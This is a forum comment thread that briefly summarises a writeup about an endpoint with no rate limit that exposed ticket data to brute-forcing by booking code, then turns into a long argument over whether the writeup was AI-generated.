This is about a non-rate-limited endpoint providing ticket data given a booking code only (and not last name as it's usually the case), which makes it feasible to bruteforce the entire search space.
(unfortunately, I feel like AI was overused in authoring the writeup)
Is it really AI slop if someone leverages AI to improve / transform their novel experiences and ideas into a rendition that they prefer?
I'm not suggesting whether or not the article is AI assisted. I'm wondering if the ease of calling someone's work "AI slop" is a step along the slippery slope towards trivializing this sort of drive-by hostility that can be toxic in a community.
You are right about the toxicity, I will edit my comment.
There's a difference between leveraging AI to proofread or improve parts of their writing and this - I feel like AI was overused here; gave the whole article that distinctive smell and significantly reduced its information density.
What makes you say that? This didn't read like AI slop to me.
Overuse of bulleted lists, unnecessary sensationalism, sentences like "The requests flew. There was no WAF, no IP blocking, no CAPTCHA." and so on. It reeks of someone pasting some notes into a chat prompt and asking it to spruce it up for publication.
Pattern recognition skill issue then. It did to me.
"The fallout"
This flaw was critical.
And other vibes. You know it when you see it, though it may be hard to define.
> You know it when you see it
How do you know your perception is accurate? One of humanity's biggest weaknesses is trusting that kind of response.
Maybe just try having confidence in yourself. Trust your instincts. I'm not going to impugn my own abilities based on some purported flaw in an abstract amorphous blog called "humanity", whatever that is. A lot of individuals of distinction have many characteristics better than the average, why wouldn't I trust myself more than other people?
Pattern recognition is a many millions of years evolved ability best exemplified in the "human" species by the way, so I basically disagree with your whole premise anyways.
The Brown killer was basically caught by a homeless man getting a bad vehicle about the future shooter. So I agree, trusting your gut is definitely a thing.
People believe in witchcraft and lots of other things - including many horrible prejudices - just as confidently as you. There's a reason any scholarship, courts, medicine, and any other serious endeavors require objective evidence.
Imagine that - doctors, who have seen everything, have years of study, treat all those people, still require objective evidence. Anyone in IT looks for objective evidence - timing, stepping through code, etc.
Confidence doesn't correlate well with accuracy; in fact the more someone expresses your kind of confidence, the less I rely on them at all.
What if you wrongfully accuse someone? Does that matter? Are you responsible for the consequences of what you do?
You turn your brain off and outsource your thinking to other people, because you're incapable of perceiving reality for yourself, is what you're telling me.
Of course everyone is responsible for their accuracy and their errors, doesn't mean it's impossible to infer things based on observation experience and intuition. This is an evolved ability, but I do agree some people are better than others like most things.
You're conflating a lot of things. Many prejudices are accurate and prudent, which craft is stupid, but so what? I'm not going to deny my perception on something that's correct just because some other idiot believes in magic; non sequitur.
It's really a bizarre argument. You are making evidence-free claims, based on nothing - including the things you say about me. It discards all of critical thought, empiricism, reasoning, philosophy, etc. ....
It's definitely AI dude
Have you ever tested your accuracy? I think there are tests out there.
What is the AI slop version of “This looks shopped. I can tell from some of the pixels and from seeing quite a few shops in my time.”
?
'Having seen this cognitive payload a lot in my time' maybe? I like the idea.
> This incident is a stark reminder
A stark reminder is a stark reminder about the existence of AI slop. You see the phrase a lot in social media comment spam.
There's an emdash, no human being uses emdashes.
Er...I've been using em—dashes since I read Knuth in the 1980s.
There are dozens of us.
Which really makes me wonder how we ended up training an AI…
you might like these
https://news.ycombinator.com/item?id=46236514
https://news.ycombinator.com/item?id=46273466
(a.) those graphs are a crime against data viz.
(b.) they practically demonstrate the point: while, yes, AI uses em-dashes, the entire corpus of em-dashes is still largely human, too, so using that as a sole signal is going to have a pretty high false positive rate.
not only that, word (and others) will convert a dash into an em-dash in text.
[flagged]
no u